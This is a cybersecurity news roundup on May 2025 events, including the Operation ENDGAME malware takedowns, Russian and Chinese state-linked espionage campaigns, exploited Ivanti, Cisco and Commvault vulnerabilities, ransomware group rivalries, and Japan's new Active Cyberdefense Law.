An international law enforcement operation coordinated by Europol and Eurojust has disrupted several global cybercrime networks. From May 19 to 22, 2025, authorities dismantled the infrastructure behind key "initial access malware" used to launch ransomware attacks. This included the takedown of around 300 servers and 650 domains, and the issuance of 20 international arrest warrants. The operation, part of the ongoing Operation ENDGAME, led to the seizure of over €3.5 million in cryptocurrency, adding to more than €21.2 million seized in total.
The crackdown targeted malware strains such as Bumblebee, Qakbot, DanaBot, Trickbot, and others, which enable hackers to infiltrate systems and deploy ransomware. US authorities also charged 16 individuals linked to the Russia-based DanaBot operation, which infected over 300,000 systems and caused at least $50 million in damage. Additionally, a Russian national, Rustam Gallyamov, was charged for leading the Qakbot malware operation, with over $24 million in cryptocurrency seized from him.
At the same time, Europol’s European Cybercrime Centre (EC3), in collaboration with Microsoft and law enforcement agencies across multiple countries, has dismantled the technical infrastructure behind Lumma Stealer (“Lumma”), a widely deployed information-stealing malware. The US Department of Justice (DOJ) dismantled the malware’s central command systems and took action against online marketplaces that trafficked in the tool.
In an unrelated action, Operation RapTor, coordinated by Europol, has led to the arrest of 270 individuals involved in dark web criminal activities (vendors, buyers, and administrators) across 11 countries, including across Austria, Brazil, France, Germany, the Netherlands, South Korea, Spain, Switzerland, the United Kingdom, and the United States. Authorities seized over $200 million in cash and digital assets, more than two metric tons of drugs, 144 kg of fentanyl or fentanyl-laced substances, and over 180 firearms.
The European Union has imposed new sanctions targeting three clusters of Russian-linked disinformation networks operating in Europe and Africa. The move marks the bloc’s 17th sanctions package against Moscow in response to its 2022 invasion and ongoing war in Ukraine.
According to a report by the Spanish Department of National Security, Russia attempted to influence elections and internal politics in Moldova, Romania, and Georgia through disinformation campaigns. The goal was to weaken their pro-European integration course and bring them back under Russian influence. Fake news, anonymous channels, and content generated using artificial intelligence were used. The report also mentions the large-scale operation ‘Doppelgänger,’ which involves tens of thousands of accounts and hundreds of websites. Similar actions have been observed in other countries, including Spain and the United States.
Between January and February 2025, the Russia-aligned threat group TAG-110 launched a phishing campaign targeting Tajikistan, using macro-enabled Word templates (.dotm files) disguised as government-themed documents. TAG-110, linked to APT28 (BlueDelta) and overlapping with UAC-0063, appears to be conducting cyber-espionage to support Russian interests in Central Asia, especially around politically sensitive periods.
This week, 21 intelligence and cybersecurity agencies from 11 countries accused Russia’s military intelligence unit known as the 85th Main Special Service Center (GTsSS), Military Unit 26165, part of the GRU (Fancy Bear, APT28, and BlueDelta), of attempting break-ins at dozens of strategic targets, particularly in NATO member states, Ukraine, and international organizations.
EclecticIQ analysts have spotted active exploitation of a vulnerability chain in Ivanti Endpoint Manager Mobile (CVE-2025-4428) by a China-linked threat group known as UNC5221. The exploitation began as early as May 15, 2025, targeting internet-facing Ivanti EPMM systems. Affected sectors include healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific.
A Chinese-speaking threat actor has been observed exploiting a critical remote code execution (RCE) vulnerability (CVE-2025-0994) in the widely used asset management platform Trimble Cityworks. The activity, detected by Cisco’s Talos threat intelligence team, has been attributed to a threat cluster tracked as “UAT-6382,” believed to involve Chinese-speaking actors. The attacks have been ongoing since at least January 2025 and have specifically targeted enterprise networks associated with local government agencies in the United States, particularly those linked to utilities management systems.
A Chinese intelligence ring operating in Turkey was recently dismantled by Turkish intelligence, local media reported. Seven suspects were caught in possession of IMSI-catcher devices—fake mobile towers used to spy on phone communications. The group had allegedly been monitoring Uyghurs and Turkish officials. While some operatives reportedly entered Turkey in March, the operation is believed to have been active for five years. Its leader, a Chinese national identified as ZL, had set up front companies and learned Turkish to support the espionage activities.
A recent investigation by the Foundation for Defense of Democracies (FDD) and cybersecurity firm TeamT5 reveals that Beijing is using a single online recruitment scheme to target both the United States and Taiwan.
The operation, linked to the Chinese tech firm Smiao Intelligence and dubbed the ‘Smiao Network,’ involves fake consulting companies posing as recruiters on online work platforms. Initially exposed for targeting laid-off US federal workers, the same approach is now being used to target individuals in Taiwan. Although FDD found no evidence of success in this latest effort, similar tactics previously led to the recruitment of a US Army intelligence analyst who leaked over 92 sensitive military documents.
ESET has detailed the tactics of a China-aligned threat group, dubbed UnsolicitedBooker, which targeted an international organization in Saudi Arabia using a previously undocumented backdoor called MarsSnake.
Cybersecurity researchers have uncovered that a threat group known as ViciousTrap has compromised approximately 5,300 network edge devices across 84 countries, transforming them into a large-scale honeypot-like network. The attackers exploited a critical vulnerability (CVE-2023-20118) in several Cisco Small Business router models to take control of the devices. The highest concentration of infections was found in Macau. The attack involves a shell script called NetGhost, which reroutes traffic from specific ports on the compromised routers to attacker-controlled infrastructure, enabling them to monitor and intercept network traffic.
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that Commvault is actively monitoring cyber threats targeting its Microsoft Azure-hosted applications. Commvault Web Server contains a vulnerability (CVE-2025-3928) that allows a remote, authenticated attacker to potentially compromise the system by creating and executing webshells. The flaw affects both Windows and Linux platforms. Commvault has addressed the issue in the following fixed versions: 11.36.46, 11.32.89, 11.28.141, and 11.20.217.
Specifically, threat actors may have accessed client secrets for Commvault's Metallic Microsoft 365 (M365) backup SaaS solution, potentially giving them unauthorized access to customers' M365 environments. CISA believes the incident could be part of a broader campaign targeting cloud infrastructures of various SaaS providers that use default configurations and elevated permissions.
A new malware campaign is exploiting TikTok’s popularity to spread information-stealing malware like Vidar and StealC. The attackers use AI-generated short videos that verbally and visually guide users to run PowerShell commands, claiming these will activate software like Microsoft Office or Spotify. Unlike traditional attacks, the commands aren't shared via text or links, making them difficult for security tools to detect. Instead, viewers are tricked into manually typing the commands, unknowingly initiating the malware infection themselves.
According to new research from Sophos, DragonForce is engaged in a “turf war” with rival ransomware groups as it attempts to dominate the cybercrime market. Following its rebranding as a ‘cartel’ in March 2025, DragonForce launched attacks on competing ransomware-as-a-service (RaaS) operators. Notably, the group is believed to be behind the infrastructure outage that hit RansomHub in late March, which led to a marked decline in ransomware activity in April. This may signal an attempted hostile takeover by DragonForce to expand its influence.
The VanHelsing ransomware-as-a-service (RaaS) operation has publicly released the source code for its Windows encryptor builder, affiliate panel, and Tor-hosted data leak site. The leak took place after a former developer, known as ‘th30c0der’, attempted to sell the tools on the RAMP cybercrime forum for $10,000. The package he offered included both Windows and Linux ransomware builders along with Tor site keys and various backend components. However, the publicly leaked archive only contains the Windows encryptor builder and related components, with the Linux builder and associated databases notably absent.
Researchers at Prodaft have warned of growing adoption of a new stealthy malware dubbed Skitnet, also known as "Bossnet," among ransomware gangs to maintain covert access and control in compromised enterprise networks. Notably, the malware has been used in real-world attacks by operations including BlackBasta, which reportedly deployed it during Microsoft Teams phishing campaigns, and Cactus.
A threat actor has been running an ongoing and sophisticated campaign involving malicious Chrome browser extensions, first detected in February 2024. The extensions, while appearing as useful productivity tools or legitimate services, are in fact sophisticated tools for cyber espionage, data exfiltration, and browser hijacking.
Palo Alto Networks’ Unit 42 researchers have uncovered a sophisticated malicious campaign aimed at dozens of Portuguese organizations, with a focus on the government, finance, and transportation sectors. The campaign is the latest operation by the threat actors behind the Lampion malware, an infostealer known for its focus on sensitive banking data, which has been in circulation at least 2019.
A sophisticated cybercriminal group dubbed Hazy Hawk has been linked to a widespread campaign hijacking abandoned cloud infrastructure, including Amazon S3 buckets and Microsoft Azure endpoints, by exploiting misconfigured Domain Name System (DNS) records.
The official website for RVTools has been hacked to distribute a malicious installer. The breach came to light after a security researcher discovered that a tampered installer from the official website was being used to sideload a malicious DLL file. The malware in question was identified as Bumblebee, a known loader used in various high-profile cyberattacks to deploy additional payloads, establish persistence, and facilitate ransomware operations.
In an unrelated incident, cybercriminals have been distributing malicious versions of the open-source KeePass password manager for at least eight months as part of a sophisticated campaign to steal credentials, deploy Cobalt Strike beacons, and ultimately launch ransomware attacks.
A new Linux-based cryptojacking campaign dubbed RedisRaider is exploiting publicly accessible Redis servers, according to researchers at Datadog Security Labs. The campaign uses legitimate Redis configuration commands to inject malicious cron jobs on vulnerable systems.
Decentralized crypto exchange Cetus suffered a major security breach, resulting in the theft of approximately $223 million. The platform was paused shortly after the incident as a precaution, and Cetus later confirmed the attack. The company said it had successfully paused $162 million of the compromised funds to prevent further losses. While investigations continue, theories about the hack's cause include a protocol vulnerability and potential price manipulation.
The Japanese government has passed a cybersecurity law that authorizes local agencies to conduct preemptive cyber operations aimed at thwarting or suppressing future attacks on the country’s digital infrastructure. Formally titled the Active Cyberdefense Law, the legislation was approved last week and is scheduled to come into full effect by 2027. Under the new law, operators of critical infrastructure such as power grids and railway systems will be legally required to report cyber breaches.
